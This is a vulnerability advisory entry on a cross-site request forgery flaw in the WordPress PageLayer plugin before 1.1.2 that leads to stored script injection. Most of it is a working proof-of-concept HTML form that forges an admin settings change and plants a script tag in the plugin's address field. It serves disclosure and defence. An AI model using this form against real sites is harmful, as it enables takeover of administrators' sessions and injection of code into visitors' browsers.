Lucene search
Chloe ChamberlandWPEX-ID:E0BF6D19-D6A4-4945-8454-950419F1EFDDHistoryMay 28, 2020 - 12:00 a.m.
Page Builder: PageLayer - Drag and Drop website builder < 1.1.2 - CSRF leading to XSS
2020-05-2800:00:00
Chloe Chamberland
20
A flaw allowed attackers to forge a request on behalf of a site’s administrator to modify the settings of the plugin which could allow for malicious Javascript injection.
<html>
<body>
<form action="http://[site]/wp-admin/admin.php?page=pagelayer" method="POST">
<input type="hidden" name="pl_support_ept[]" value="post" />
<input type="hidden" name="pl_support_ept[]" value="page" />
<input type="hidden" name="pagelayer_content_width" value="" />
<input type="hidden" name="pagelayer_between_widgets" value="" />
<input type="hidden" name="pagelayer_body_font" value="" />
<input type="hidden" name="pagelayer_tablet_breakpoint" value="" />
<input type="hidden" name="pagelayer_mobile_breakpoint" value="" />
<input type="hidden" name="pagelayer_icons_set[]" value="font-awesome5" />
<input type="hidden" name="pagelayer-address" value="<script>alert(0)</script>" />
<input type="hidden" name="pagelayer-phone" value="+1234567890" />
<input type="hidden" name="pagelayer_cf_to_email" value="" />
<input type="hidden" name="submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
prion
prion
Cross site request forgery (csrf)
2021-01-01 04:15:00
wpvulndb
wpvulndb
cvelist
cvelist
CVE-2020-35944
2021-01-01 03:28:58
cve
cve
CVE-2020-35944
2021-01-01 04:15:00
openvas
openvas
WordPress PageLayer Plugin < 1.1.2 Multiple Vulnerabilities
2023-08-22 00:00:00
Related for WPEX-ID:E0BF6D19-D6A4-4945-8454-950419F1EFDD